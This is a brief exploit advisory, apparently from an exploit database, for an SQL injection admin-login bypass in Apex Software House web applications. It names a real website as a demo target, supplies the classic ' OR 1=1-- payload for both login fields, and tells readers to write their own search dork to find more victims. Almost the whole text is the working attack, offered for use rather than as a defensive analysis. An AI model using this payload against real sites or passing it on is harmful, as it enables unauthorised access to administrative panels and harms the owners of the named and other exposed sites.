Apex Software House suffers from a remote SQL injection vulnerability that allows for administrative bypass. Note that this finding houses site-specific data.
256a7fdde2760cab6f4aac183b9d27c86f25c570ddaba2ae1969ed8f1a7a9946
____ ____ _____ ___ ___ ____ ____
| \ | / ___/| | | / || \
| D ) | ( \_ | _ _ || o || _ |
| / | |\__ || \_/ || || | |
| \ | |/ \ || | || _ || | |
| . \ | |\ || | || | || | |
|__|\_||____|\___||___|___||__|__||__|__|
# Exploit name: Apex Software House admin page bypass
# Google dork: Make one by yourself !
# Exploit author: Risman
# Tested on: Linux
# Security Risk : High
# Category: Web Application
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# Sample: http://site.com/Login.aspx
# Demo : http://pagodasteel.com/Login.aspx
-User Name= ' OR 1=1--
-Password = ' OR 1=1--